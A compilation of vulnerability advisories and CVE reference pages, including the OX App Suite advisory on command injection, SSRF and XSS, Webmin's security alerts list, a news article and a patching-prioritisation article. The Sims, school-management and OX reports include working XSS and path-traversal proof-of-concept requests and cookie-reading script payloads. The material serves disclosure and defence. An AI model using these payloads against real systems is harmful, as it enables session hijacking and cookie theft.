OX App Suite through 7.10.6 allows SSRF because multipart/form-data boundaries are predictable, and this can lead to injection into internal Documentconverter API calls.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Martin Heiland via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Thu, 21 Jul 2022 11:04:12 +0200 (CEST)  

Dear subscribers,

we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those 
vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
  Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH



Internal reference: DOCS-4106
Vulnerability type: OS Command Injection (CWE-78)
Vulnerable version: 7.10.6 and earlier
Vulnerable component: documentconverter
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev13, 7.10.3-rev6, 7.10.4-rev6, 7.10.5-rev5, 7.10.6-rev3
Vendor notification: 2022-01-10
Solution date: 2022-01-13
Public disclosure: 2022-07-21
CVE reference: CVE-2022-23100
CVSS: 8.2 (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L)

Vulnerability Details:
OX Documentconverter has a Remote Code Execution flaw that allows authenticated OX App Suite users to run commands on 
the instance which runs OX Documentconverter if they have the ability to perform document conversions, for example of 
E-Mail attachments or OX Drive content.

Risk:
Attackers can inject arbitrary operating-system level commands via OX App Suite API and/or OX Documentconverter API. 
Commands are executed on the instance running OX Documentconverter, based on "open-xchange" user privileges. This can 
be used to modify or exfiltrate configuration files as well as adversely affect the instances availability by excessive 
resource usage. By default the vulnerable Documentconverter API is not publicly accessible, however this might be 
worked around by abusing other weaknesses, configuration flaws or social engineering.

Steps to reproduce:
1. Create a forged Documentconverter API call that embeds escape characters and a system command
2. Inject the malicious API call via App Suite as a proxy or other means

Solution:
We reduceed available API parameters to a limited set of enumerations, rather than accepting API input.



---



Internal reference: MWB-1350
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.6 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev78, 7.10.3-rev38, 7.10.4-rev31, 7.10.5-rev37, 7.10.6-rev9
Vendor notification: 2021-11-30
Solution date: 2022-02-15
Public disclosure: 2022-07-21
CVE reference: CVE-2022-23099
CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Existing sanitization and filtering mechanisms for HTML files can be bypassed by forcing block-wise read. Using this 
technique, the recognition procedure misses to detect tags and attributes that span multiple blocks.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted 
actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the 
victim to follow a hyperlink.

Steps to reproduce:
1. As attacker, create a HTML malicious code-snippet which masks tags (e.g. <script>) by block boundaries
2. Upload the code snippet to drive and create a sharing link
3. Sent that link to a victim and make it follow it

Solution:
We now check for possible HTML content through overlapping reads from data streams.



---



Internal reference: MWB-1366
Vulnerability type: n/a
Vulnerable version: 7.10.6 and earlier
Vulnerable component: middleware
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev78, 7.10.3-rev38, 7.10.4-rev31, 7.10.5-rev38, 7.10.6-rev9
Vendor notification: 2021-12-10
Solution date: 2022-02-15
Public disclosure: 2022-07-21
CVE reference: CVE-2021-42550
CVSS: n/a

Vulnerability Details:
In the wake of the CVE-2021-44228 (Log4Shell) issue, a similar potential vulnerability at the Logback library has been 
identified (LOGBACK-1591, CVE-2021-42550). At its default configuration, OX App Suite is not susceptible to this 
vulnerability and there are no scenarios that require to deploy a vulnerable configuration.

Risk:
We provide this update strictly as a precaution to mitigate the possibility of a vulnerability. Exploiting 
CVE-2021-42550 at this point would require privileged access to alter system configuration.

Steps to reproduce:
1. n/a

Solution:
We provided a component update to Logback 1.2.8 and slf4j 1.7.32.



---



Internal reference: OXUIB-1172
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev69, 7.10.3-rev31, 7.10.4-rev28, 7.10.5-rev30
Vendor notification: 2021-11-30
Solution date: 2022-02-15
Public disclosure: 2022-07-21
CVE reference: CVE-2022-23101
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Deep-links within E-Mail (e.g. links to Drive files) are not checked for malicious use of the appHandler function (see 
CVE-2021-38374) and may therefore be used to inject references to malicious code.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted 
actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require to 
forge App Suite specific mails and force the victim to follow a hyperlink.

Steps to reproduce:
1. As an attacker, create a malicious E-Mail that uses App Suite "Deep-links" as mail header and embed a call to the 
AppLoader component
2. Deliver the mail and make the victim open the link

Proof of concept:
X-Open-Xchange-Share-URL: https://example.com/#!!&app=%2e./%2e./%2e./%2e./%2e./%2e./appsuite/drive/script.js?cut=&id=123

Solution:
We now check for a enumeration of valid applications for deep-links as well.



---



Internal reference: DOCS-4161
Vulnerability type: OS Command Injection (CWE-78)
Vulnerable version: 7.10.6 and earlier
Vulnerable component: documentconverter
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev14, 7.10.3-rev7, 7.10.4-rev7, 7.10.5-rev6, 7.10.6-rev3
Vendor notification: 2022-01-24
Solution date: 2022-02-15
Public disclosure: 2022-07-21
CVE reference: CVE-2022-24405
CVSS: 7.3 (CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N)

Vulnerability Details:
The compatibility layer of documentconverter API processes serialized Java classes when using remote cache calls. This 
can be exploited to inject malicious code that is being executed in the context of the documentconverter component.

Risk:
Attackers can inject arbitrary operating-system level commands via the OX Documentconverter API. Commands are executed 
on the instance running OX Documentconverter, based on "open-xchange" user privileges. This can be used to modify or 
exfiltrate configuration files as well as adversely affect the instances availability by excessive resource usage. By 
default the vulnerable OX Documentconverter API is not publicly accessible and we are not aware that this could have 
been exploited without privileged network or system access.

Steps to reproduce:
1. Create a malicious Java class and serialize it
2. Use the OX Documentconverter API to inject this class as a reference/hash to remote caches

Solution:
We now apply input sanitization to this API call and retrict it to strings. We also implemented a set of additional 
hardening procedures for other API calls which work in a similar way.



---



Internal reference: DOCS-4120
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.6 and earlier
Vulnerable component: documentconverter-api
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev10, 7.10.3-rev5, 7.10.4-rev6, 7.10.5-rev6, 7.10.6-rev3
Vendor notification: 2022-01-10
Solution date: 2022-02-15
Public disclosure: 2022-07-21
CVE reference: CVE-2022-24406
CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)

Vulnerability Details:
By creating colissions of HTTP multipart-formdata boundaries it is possible to alter the API request parameters between 
OX App Suite and OX Documentconverter. Legitimate multipart-formdata boundaries are created based on a timestamp with 
millisecond resolution. This allows attackers to predict the next boundary and attempt to overwrite its content. The 
most practical way to exploit this is sending a large number of formdata parts, each with a unique boundary based on a 
future point in time.

Risk:
Attackers can modify parameters of internal API calls to OX Documentconverter and by that circumvent network trust 
boundaries. In effect, a server-side request forgery attack is possible, for example to exploit DOCS-4106 
(CVE-2022-23100) with limited privileges using OX App Suite API as a "proxy".

Steps to reproduce:
1. Create a HTTP request with multipart-formdata boundaries representing timestamps in the near future
2. Add internal API parameters to those multipart-formdata sections and use them as requests to OX App Suite API

Solution:
We modified the algorithm to create multipart-formdata boundaries in a way that they are no longer predictable. We also 
restricted the number of multipart-formdata parts to a sensible amount and issue an Exception if a client exceeds it.

**Attachment: signature.asc**  
_Description:_

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Open-Xchange Security Advisory 2022-07-21** _Martin Heiland via Fulldisclosure (Jul 21)_

CVE-2022-24406: Full Disclosure: Open-Xchange Security Advisory 2022-07-21

Sims v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /uploadServlet. This vulnerability allows attackers to escalate privileges and execute arbitrary commands via a crafted file.

CVE-2022-34549: CWE-434: Unrestricted Upload of File with Dangerous Type (4.8)

Sims v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /addNotifyServlet. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the notifyInfo parameter.

****\[Suggested description\]****

This open source system is a student information management system. There was an insecurity vulnerability in the announcement. Attackers can use this vulnerability to implement cross-site scripting attacks on website visitors, such as "cookie theft" and "browser escape".  
POST: http://localhost:8081/sims/addNotifyServlet

**\[Vulnerability Type\]**

Relative Path Traversal

****\[Vendor of Product\]****

https://github.com/rawchen/sims

****\[Affected Product Code Base\]****

1.0

****\[Affected Component\]****

Sims 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

****\[Attack vector\]****

    POST /sims/addNotifyServlet HTTP/1.1
    Host: localhost:8081
    Content-Length: 61
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost:8081
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8081/sims/notifyServlet
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=77DABFA8A6AB24922A384BFF7C7B9517
    Connection: close
     
    notifyInfo=%3Cscript%3Ealert%28%22123456%22%29%3C%2Fscript%3E
    

****\[Attack Type\]****

Remote

****\[Impact Code execution\]****

False

****\[Proof of concept\]****

Step1: Select "Announcement List" under the "System Management" tab, fill in the constructed payload into the input box, and publish it.

Step2: When accessing the bulletin, the vulnerability is triggered

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/79.html

CVE-2022-34550: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') · Issue #8 · rawchen/sims

Security release also includes precautionary patches for potential Log4j-like flaw in Logback library

Security release also includes precautionary patches for potential Log4j-like flaw in Logback library

Diversified technology and infrastructure software provider Open-Xchange has released fixes for several security vulnerabilities impacting OX App Suite.

Available as an on-premise solution or as part of the organization’s cloud offering, OX App Suite is secure email and collaboration software designed for telcos, web hosting firms, and service providers.

The latest patch release includes fixes for two remote code execution (RCE) vulnerabilities that were discovered in the software’s document converter component. CVE-2022-23100 and CVE-2022-24405 earned CVSS scores of 8.2 and 7.3, respectively.

The document converter API was also found to harbor a server-side request forgery (SSRF) vulnerability (CVE-2022-24406) that potentially allowed attackers to predict boundaries and overwrite its content.

**Preemptive patches**

Further down the severity list are two cross-site scripting (XSS) flaws impacting OX App Suite (CVE-2022-23099, CVE-2022-23101). In order to exploit these flaws, an attacker would need to force a victim to click on a malicious link.

In the wake of the Log4Shell issue that rocked the global software development industry last December, OX App Suite also includes an update that addresses a similar potential issue in the Logback component (CVE-2021-42550).

**YOU MIGHT ALSO LIKE** Cisco patches dangerous bug trio in Nexus Dashboard

“At its default configuration, OX App Suite is not susceptible to this vulnerability and there are no scenarios that require to deploy a vulnerable configuration,” the Open-Xchange security advisory reads.

“We provide this update strictly as a precaution to mitigate the possibility of a vulnerability. Exploiting CVE-2021-42550 at this point would require privileged access to alter system configuration.”

**External input**

When asked whether the vulnerabilities were discovered as part of the company’s bug bounty program, Open-Xchange CISO Martin Heiland told _The Daily Swig_: “For this advisory, it was a 50/50 thing. We use input from the bug bounty program as inspiration for our internal research.

“In this case, the full impact of a seemingly ‘medium’ issue reported via the bounty program led to a thorough review process and discovery of a potential remote code execution flaw.”

Read more of the latest news about security vulnerabilities

Heiland added: “Combining internal reviews with external input makes our program very impactful and helps with continuous learning and challenging of our engineering teams. I have been running the bug bounty program for about six years, and it has been very successful for our web applications.”

The vulnerabilities impact OX App Suite versions 7.10.6 and earlier. They have all been fixed by the vendor in various branch updates.

“Most users run automated deployment and our own hosted service uses ‘cloud native’ automation/orchestration, which allows very swift updates,” Heiland said. “Of course, we advise updating as soon as possible, regardless of the deployment method.”

**RECOMMENDED** FileWave MDM authentication bypass bugs expose managed devices to hijack risk

Open-Xchange issues fixes for RCE, SSRF bugs in OX App Suite

Software vulnerabilities are a major threat to organizations today. The cost of these threats is significant, both financially and in terms of reputation.Vulnerability management and patching can easily get out of hand when the number of vulnerabilities in your organization is in the hundreds of thousands of vulnerabilities and tracked in inefficient ways, such as using Excel spreadsheets or

Software vulnerabilities are a major threat to organizations today. The cost of these threats is significant, both financially and in terms of reputation.

Vulnerability management and patching can easily get out of hand when the number of vulnerabilities in your organization is in the hundreds of thousands of vulnerabilities and tracked in inefficient ways, such as using Excel spreadsheets or multiple reports, especially when many teams are involved in the organization.

Even when a process for patching is in place, organizations still struggle to effectively patch vulnerabilities in their assets. This is generally because teams look at the severity of vulnerabilities and tend to apply patches to vulnerabilities in the following severity order: critical > high > medium > low > info. The following sections explain why this approach is flawed and how it can be improved.

****Why is Patching Difficult?****

While it is well known that vulnerability patching is extremely important, it is also challenging to patch vulnerabilities effectively. Vulnerabilities can be reported from sources such as pentest reports and various scanning tools. Scans can be performed on your web applications, APIs, source code, infrastructure, dependencies, containers, etc.

The total number of reports that need to be sifted through to prioritize patches can increase drastically even in a short period of time, and when multiple teams are involved, this can further increase the complexity and time required to coordinate and prioritize patches.

To make matters worse, new exploits keep on surfacing almost daily, and keeping track of new exploits and available patches can become a mammoth task that can quickly get out of hand if not addressed properly. Unless an organization has a very mature security program in place, it is complicated to manage patching effectively.

****Taking the Risk-Based Approach to Patching Vulnerabilities****

Simplifying patching requires you to simplify prioritizing first. "Risk-based approach" means that you'll weigh the potential impact of a vulnerability against the likelihood of its exploitation. This allows you to determine whether or not it's worth taking action.

To simplify prioritizing, you have to consider the following things:

*   The exposure of the asset,
*   The business sensitivity of the asset,
*   The severity of the vulnerability reported against the asset,
*   The availability of an exploit for the vulnerability reported,
*   The complexity of the exploit, if it is available,
*   The taxonomy of the vulnerability reported.

_\* Asset could be anything within your organization, like a web application, mobile application, code repository, router, server, database, etc._

Simplifying Prioritization

This approach helps in drastically reducing the time spent to prioritize vulnerabilities. Let's discuss each point in detail:

**Exposure:** If your asset is public-facing the Internet, or private, i.e., behind a firewall within the network with controlled access. Public assets usually carry a higher risk, but that does not always mean they should be prioritized. The reason is that not every public asset is sensitive. Some public assets may simply be static pages that do not contain user data, while other public assets could be handling payments and PII information. So even if an asset is public, you must consider its sensitivity.

**Asset sensitivity:** Categorize the business sensitivity of all your assets based on how important that asset is to your business. An asset that contains sensitive information about users or processes payments may be categorized as a critical business sensitivity asset. An asset that provides only some static content can be classified as an asset with low business sensitivity.

**Severity of the reported vulnerability:** This one is self-explanatory; you have to prioritize vulnerabilities in order of critical > high > medium > low > info severity.

**Exploit availability:** Vulnerabilities for which public exploits are already available should be prioritized over vulnerabilities for which no exploits are available.

**Exploit complexity:** If an exploit is very easy to exploit and requires little to no user interaction, then vulnerabilities for this type of exploit should be prioritized over vulnerabilities with very complex exploits that typically require high privileges and user interaction.

**Taxonomy:** The classification of the vulnerability reported also has to be taken into consideration and should be mapped with industry standards like OWASP or CWE. An example would be that a remote code execution impacting a server should be prioritized higher than a client-side vulnerability, say a Reflected Cross Site Scripting.

Time spent to prioritize vulnerabilities

An example of a high prioritized vulnerability would be if the asset which is affected is publicly exposed, has a critical business sensitivity, the vulnerability severity is critical, an exploit is available, and does not require user interaction or authentication/privileges.

Once all vulnerabilities are prioritized, addressing the most critical vulnerabilities will dramatically reduce the risk to your organization.

So what issues should a vulnerability management report measure to assure your application security satisfactorily? - Check out the Whitepaper.

****How to get the information about patches?****

You can get information about patches from various advisories like NVD. In these reports, you can find multiple references on how to patch the vulnerabilities. Also, the websites of the products you use usually provide this information. While it is possible to manually go through all the sources and get the information about the patches, if there are many security vulnerabilities in your organization, getting all the information from multiple sources can be tedious.

****The Solution:****

Strobes can significantly help organizations of all sizes dramatically reduce the time it takes to prioritize vulnerabilities and provide patching information within the platform. Prioritization is also easy because Strobes automatically prioritizes vulnerabilities for you based on the metrics described in the Risk-Based Approach to Patching Vulnerabilities section.

Strobes Security is leading the way to disrupt the vulnerability management space with its flagship products VM365 and PTaaS. If you're not yet a Strobes Security's user, what are you waiting for? Sign up for free here, or Schedule a demo.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Taking the Risk-Based Approach to Vulnerability Patching

The Read Mail module in Webmin 1.995 and Usermin through 1.850 allows XSS via a crafted HTML e-mail message.

**Security Alerts**

This page lists security problems found in Webmin and Usermin, versions affected and recommended solutions.

Found a new security bug? Report it at security@webmin.com.

**Webmin 1.995 and below - XSS vulnerability in the HTTP Tunnel module**  

If a less-privileged Webmin user is given permission to edit the configuration of the HTTP Tunnel module, he could use this to introduce a vulnerability that captures cookies belonging to other Webmin users that use the module. Thanks to BLACK MENACE and PYBRO for reporting this issue.

**Webmin 1.995 and Usermin 1.850 and below - XSS vulnerabiliy in the Read Mail module**  

An HTML email crafted by an attacker could capture browser cookies when opened. Thanks to ly1g3 for reporting this bug.

**Webmin 1.991 and below - privilege escalation exploit (CVE-2022-30708)**  

Less privileged Webmin users (excluding those created by Virtualmin and Cloudmin) can modify arbitrary files with root privileges, and so run commands as root. All systems with additional untrusted Webmin users should upgrade immediately. Thanks to esp0xdeadbeef and V1s3r1on for finding and reporting this issue!

**Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829)**  

Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. Thanks to Faisal Fs (faisalfs10x) from NetbyteSEC for finding and reporting this issue!

**Virtualmin Procmail wrapper version 1.0 - Privilege escalation exploit.**  

Version 1.0 of the procmail-wrapper package installed with Virtualmin has a vulnerability that can be used by anyone with SSH access to gain root privileges. To prevent this, all Virtualmin users should upgrade to version 1.1 or later immediately.

**Webmin 1.973 and below - XSS vulnerabilities if Webmin is installed using the setup.pl script (CVE-2021-31760, CVE-2021-31761 and CVE-2021-31762)**  

If Webmin is installed using the non-recommended setup.pl script, checking for unknown referers is not enabled by default. This opens the system up to XSS and CSRF attacks using malicious links.  
Fortunately the standard RPM, Deb, TAR and Solaris packages do not use this script and so are not vulnerable. If you did install using the setup.pl script, the vulnerability can be fixed by adding the line referers\_none=1 to /etc/webmin/config . Thanks to Meshal ( Mesh3l\_911 ) @Mesh3l\_911 and Mohammed ( Z0ldyck ) @electronicbots for finding and reporting this issue!

**Webmin 1.941 and below - XSS vulnerability in the Command Shell module (CVE-2020-8820 and CVE-2020-8821)**  

A user with privileges to create custom commands could exploit other users via unescaped HTML. Thanks to Mauro Cáseres for reporting this and the following issue.

**Webmin 1.941 and below - XSS vulnerability in the Read Mail module (CVE-2020-12670)**  

Saving a malicious HTML attachment could trigger and XSS vulnerability.

**Webmin 1.882 to 1.921 - Remote Command Execution (CVE-2019-15231)**  

Webmin releases between these versions contain a vulernability that allows remote command execution! Version 1.890 is vulnerable in a default install and should be upgraded immediately - other versions are only vulnerable if changing of expired passwords is enabled, which is not the case by default.  
Either way, upgrading to version 1.930 is strongly recommended. Alternately, if running versions 1.900 to 1.920, edit /etc/webmin/miniserv.conf, remove the passwd\_mode= line, then run /etc/webmin/restart.  
For more details, see our What Happened page.

**Webmin 1.900 - Remote Command Execution (Metasploit)**  

This is NOT a workable exploit as it requires that the attacker already know the root password. Hence there is no fix for it in Webmin.

**Malicious HTTP headers in downloaded URLs**  
Affects Webmin versions up to 1.860, if the Upload and Download or File Manager module is used to fetch an untrusted URL.

If a Webmin user downloads a file from a malicious URL, HTTP headers returned can be used exploit an XSS vulnerability. Thanks to independent security researcher, John Page aka hyp3rlinx, who reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

**Authentic theme configuration page vulnerability**  
Affects Webmin versions up to 1.800, but is only an issue if your system has un-trusted users with Webmin access and is using the new Authentic theme.

A non-root Webmin user could use the theme configuration page to execute commands as root.

**Authentic theme remote access vulnerability**  
Affects Webmin versions up to 1.800, but only if the Authentic theme is enabled globally.  

An attacker could execute commands remotely as root, as long as there was no firewall blocking access to Webmin's port 10000.

**XSS (cross-site scripting) vulnerability in xmlrpc.cgi**  
Affects Webmin versions up to 1.750.  

A malicious website could create links or Javascript referencing the xmlrpc.cgi script, triggered when a user logged into Webmin visits the attacking site. Thanks to Peter Allor from IBM for finding and reporting this issue (CVE-2015-1990).

**Read Mail module vulerable to malicious links**  
Affects Webmin versions up to 1.720.  

If un-trusted users have both SSH access and the ability to use Webmin's Read Mail module (as is the case for Virtualmin domain owners), a malicious link could be created to allow reading any file on the system - even those owned by root. Thanks to Patrick William from RACK911 labs for finding this bug.

**Shellshock vulnerability**  
Affects Webmin versions up to 1.700.  

If your bash shell is vulnerable to shellshock, it can be exploited by attackers who have a Webmin login to run arbitrary commands as root. Updating to version 1.710 (or updating bash) will fix this issue.

**Yet another XSS (cross-site scripting) security hole**  
Affects Webmin versions up to 1.590.  

A malicious website could create links or Javascript referencing the File Manager module that allowed execution of arbitrary commands via Webmin when the website is viewed by the victim. See CERT vulnerability note VU#788478 for more details. Thanks to Jared Allar from the American Information Security Group for reporting this problem.

**Referer checks don't include port**  
Affects Webmin versions up to 1.590.  

If an attacker has control over http://example.com/ , he could create a page with malicious Javascript that could take over a Webmin session at https://example.com:10000/ when http://example.com/ is viewed by the victim. Thanks to Marcin Teodorczyk for finding this issue.

**Another XSS (cross-site scripting) security hole**  
Affects Webmin versions up to 1.540.  

This vulnerability can be triggered if an attacker changes his Unix username via a tool like chfn, and a page listing usernames is then viewed by the root user in Webmin. Thanks to Javier Bassi for reporting this bug.

**Unsafe file writes in Virtualmin**  
Affects Virtualmin versions before 3.70.  

This bug allows a virtual server owner to read or write to arbitrary files on the system by creating malicious symbolic links and then having Virtualmin perform operations on those links. Upgrading to version 3.70 is strongly recommended if your system has un-trusted domain owners.

**XSS (cross-site scripting) security hole**  
Affects Webmin versions up to 1.390, and Usermin up to 1.320.  

This attack could open users who visit un-trusted websites while having Webmin open in the same browser up to having their session cookie captured, which could then allow an attacker to login to Webmin without a password. The quick fix is to go to the **Webmin Configuration** module, click on the **Trusted Referers** icon, set **Referrer checking enabled?** to **Yes**, and un-check the box **Trust links from unknown referrers**. Webmin 1.400 and Usermin 1.330 will make these settings the defaults.

**Windows-only command execution bug**  
Affects Webmin on Windows only, versions before 1.380.  

Any user logged into Webmin can execute any command using special URL parameters. This could be used by less-privileged Webmin users to raise their level of access.  
Thanks for Keigo Yamazaki of Little eArth Corporation for finding this bug.

**pam\_login.cgi XSS bug**  
Affects Webmin versions below 1.347, and Usermin versions below 1.277, on any operating system.  

A malicious link to Webmin's pam\_login.cgi script can be used to execute Javascript within the Webmin server context, and perhaps steal session cookies.

**chooser.cgi XSS bug**  
Affects Webmin versions below 1.330, and Usermin versions below 1.260, on any operating system.  

When using Webmin or Usermin to browse files on a system that were created by an attacker, a specially crafted filename could be used to inject arbitrary Javascript into the browser.

**Remote source code access and XSS bug**  
Affects Webmin versions below 1.296, and Usermin versions below 1.226, on any operating system.  

An attacker can view the source code of Webmin CGI and Perl programs using a specially crafted URL. Because the source code for Webmin is freely available, this issue should only be of concern to sites that have custom modules for which they want the source to remain hidden.  
The XSS bug makes use of a similar technique to craft a URL that can allow arbitrary Javascript to be executed in the user's browser if a malicious link is clicked on.  
Thanks for Keigo Yamazaki of Little eArth Corporation for finding this bug.

**Artbitrary remote file access**  
Affects Webmin versions below 1.290, and Usermin versions below 1.220, on any operating system.  

An attacker without a login to Webmin can read the contents of any file on the server using a specially crafted URL. All users should upgrade to version 1.290 as soon as possible, or setup IP access control in Webmin.  
Thanks to Kenny Chen for bringing this to my attention.

**Windows artbitrary file access**  
Affects Webmin versions below 1.280, when running on a Windows server.  

If running Webmin on Windows, an attacker can remotely view the contents of any file on your system using a specially crafted URL. This does not affect other operating systems, but if you use Webmin on Windows you should upgrade to version 1.280 or later.  
Thanks to Keigo Yamazaki of Little eArth Corporation for discovering this bug.

**Perl syslog input attack**  
Affects Webmin versions below 1.250 and Usermin versions below 1.180, with syslog logging enabled.  

When logging of failing login attempts via syslog is enabled, an attacker can crash and possibly take over the Webmin webserver, due to un-checked input being passed to Perl's syslog function. Upgrading to the latest release of Webmin is recommended.  
Thanks to Jack at Dyad Security for reporting this problem to me.

**'Full PAM conversations' mode remote attack**  
Affects Webmin versions between 1.200 and 1.220 and Usermin version between 1.130 and 1.150, when the option **Support full PAM conversations?** is enabled on the **Authentication** page.  

When this option is enabled in Webmin or Usermin, an attacker can gain remote access to Webmin without needing to supply a valid login or password. Fortunately this option is not enabled by default and is rarely used unless you have a PAM setup that requires more than just a username and password, but upgrading is advised anyway.  
Thanks to Keigo Yamazaki of Little eArth Corporation and JPCERT/CC for discovering and notifying me of this bug.

**Brute force password guessing attack**  
Affects Webmin versions below 1.175 and Usermin version below 1.104  

All versions of Webmin below 1.175 do not have password timeouts turned on by default, so an attacker can try every possible password for the root or admin user until he finds the correct one. The solution is to enable password timeouts, so that repeated attempts to login as the same user will become progressively slower. This can be done by following these steps :

*   Go to the **Webmin Configuration** module.
*   Click on the **Authentication** icon.
*   Select the **Enable password timeouts** button.
*   Click the **Save** button at the bottom of the page.

This problem is also present in Usermin, and can be prevented by following the same steps in the **Usermin Configuration** module.

**Usermin cross-site scripting vulnerability**  
Affects Usermin versions below 1.080  

When viewing HTML email, several potentially dangerous types of URLs can be passed through. This can be used to perform malicious actions like executing commands as the logged-in Usermin user. Can only be resolved by upgrading to Webmin 1.150 or Usermin 1.080.

**Module configurations are visible**  
Affects Webmin versions below 1.150  

Even if a Webmin user does not have access to a module, he can still view it's Module Config page by entering a URL that calls config.cgi with the module name as a parameter. This can only be resolved by upgrading to version 1.150 or later.

**Account lockout attack**  
Affects Webmin versions below 1.150 and Usermin versions below 1.080  

By sending a specially constructed password, an attacker can lock out other users if password timeouts are enabled. This can only be resolved by upgrading to Webmin 1.150 or Usermin 1.080.

CVE-2022-36880: Webmin

Advanced School Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component ip/school/moudel/update_subject.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Subject text field.

**Advanced School Management System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

**Vul\_Author: Liyuan Ji**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/subject.php

Vulnerability location: ip/school/moudel/update\_subject.php

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an exemple with alert:

    GET /school/model/update_subject.php?id=15&nama=%3Cscript%3Ealert(documant.cookie)%3C/script%3E$do=update_subject HTTP/1.1
    Host: 192.168.1.19
    User-Agent: Mozilla/5.0(X11;Linux x86_64; rw:91.0) Gecko/20100101Firefox/91.0
    Accept: */*
    Accept-Language: en-Us,en;q-0.5
    Accept-Encoding: gzip,deflate
    Connection: close
    Referer: http://192.168.1.19/school/view/subject.php
    Cookie: PHPSESSID=5nicpveormjn86h3bf398fsem3
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    

We click the subject interface and edit it.

XSS script that writes the burst cookie.

After we update, click subject again.

We have obtained the cookie.

It can be seen from the source code that it is an XSS attack using SQL injection vulnerability.

CVE-2022-34594: bug_report/XSS-1.md at master · gitgeniuss/bug_report

A cross-site scripting (XSS) vulnerability in /index.php/?p=report of Online Fire Reporting System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "Contac #" text field.

**Online Fire Reporting System v1.0 has XSS injection vulnerability**

Login account: admin/admin123

vendor : https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability file: /ofrs/report.php

Vulnerability location: /index.php/?p=report

\[+\]Payload:

When the report sent by the user is mixed with malicious code, as follows

At this time, when the administrator checks the daily report, he will receive XSS attack

CVE-2022-34611: CVE-report/OFRS.md at main · As4ki/CVE-report

InMailX Outlook Plugin < 3.22.0101 is vulnerable to Cross Site Scripting (XSS). InMailX Connection names are not sanitzed in the Outlook tab, which allows a local user or network administrator to execute HTML / Javascript in the Outlook of users.

**Enterprise Email Management, Compliance and Productivity Solution**

**inMailX** is an enterprise email management, compliance and productivity solution for Microsoft Outlook and Office 365, which provides the functionality and tools users need to effectively manage their emails and attachments.  inMailX integrates seamlessly with records and document management systems, cloud and network folder structures, helping users improve their email filing compliance.

